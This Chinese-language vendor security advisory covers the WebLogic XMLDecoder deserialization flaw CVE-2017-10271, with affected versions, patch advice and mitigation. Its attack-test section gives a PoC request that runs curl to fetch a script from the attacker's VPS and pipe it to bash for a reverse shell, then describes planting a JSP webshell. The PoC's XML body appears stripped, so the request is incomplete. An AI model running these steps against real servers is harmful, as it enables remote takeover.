国舜股份毕加索实验室XMLDecoder反序列化漏洞安全预警通告

国舜股份

毕加索实验室

高 危

WebLogic XMLDecoder反序列化漏洞（CVE-2017-10271）安全预警通告

【漏洞描述】北京国舜科技股份有限公司于北京时间2017年12月23日时许关注到WebLogicXMLDecoder反序列化漏洞，CVE编号为CVE-2017-10271。经国舜安全实验室紧急成立应急响应小组，研究到是Oracle FusionMiddleware中的OracleWebLogic Server组件的WLSSecurity子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行，攻击者只需要发送精心构造的HTTP请求，就可以拿到目标服务器的权限。攻击者可利用该漏洞控制组件，影响数据的可用性、保密性和完整性。

【漏洞评级】高危

【CVE编号】CVE-2017-10271

【影响范围】

OracleWebLogic Server 10.3.6.0.0版本

OracleWebLogic Server 12.1.3.0.0版本

OracleWebLogic Server 12.2.1.1.0版本

【漏洞攻击测试】

外网Linux服务器一枚(我用的是ubuntu16.04)，burpsuite一个。

一般情况下weblogic会开放7001以及7002端口，如果访问/wls-wsat/CoordinatorPortType11目录，存在下图则说明或许存在漏洞

首先在外网服务器上安装python2.7。

然后在本机上写一个bash反弹脚本(填写自己的服务器和将要用nc监听的端口)

然后将这个bash脚本通过Winscp或者其他放到你的服务器上。

随后用xshell连接服务器，执行(python服务器端口和nc的端口可以自己随便来设置)

执行后就可以。

【用poc进行测试】

续接上述步骤，用poc进行测试。

POST/wls-wsat/CoordinatorPortType11 HTTP/1.1

Host: xxx:xxx

User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727;.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv:11.0) like Gecko

Accept: */*

Content-Type:text/xml

Accept-Language:zh-cn

Content-Length:690

Connection: close

/bin/bash

-c

curlvpsip:pythonport//a.shbash

红色这里是重点，不能改。然后进行执行repeater的go

服务器返回。

S:Server

随后你就会在自己的vps上得到一个反弹shell。

样就OK了，如果你要拿到shell的话直接cd到servers/AdminServer/tmp

/_WL_internal/bea_wls_internal/9j4dqk/war/目录，此为系统默认目录，然后可以在poc上wget一个jsp脚本，然后使用mv命令进行移动到此目录，最重要的你用菜刀连接的话，不是连接的此目录，而是/bea_wls_internal/目录下的脚本文件。

【漏洞POC】见附件

【修复建议】

升级Oracle 10月份补丁；

对访问wls-wsat的资源进行访问控制。

【临时防护方案】

1）根据实际环境路径，删除WebLogic程序下列war包及目录

rm -f/home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war

rm -f/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war

rm -rf/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

2）重启WebLogic或系统后，确认以下链接访问是否为404

http://x.x.x.x:7001/wls-wsat

关于国舜股份

国舜股份成立于2003年，是一家专注信息安全的高新技术企业，拥有一流安全团队，专业的安全产品，顶级的安全服务资质，研发多项具有自主知识产权的产品。深耕金融信息安全，推动金融信息安全走向全生命周期安全管理，走向安全与业务相融合，最终建立面向应用的信息安全管理体系。一直以来聚焦安全的前沿，致力于做安全云化、安全大数据化、安全服务化、关键行业安全精深化的信息安全领域开拓者。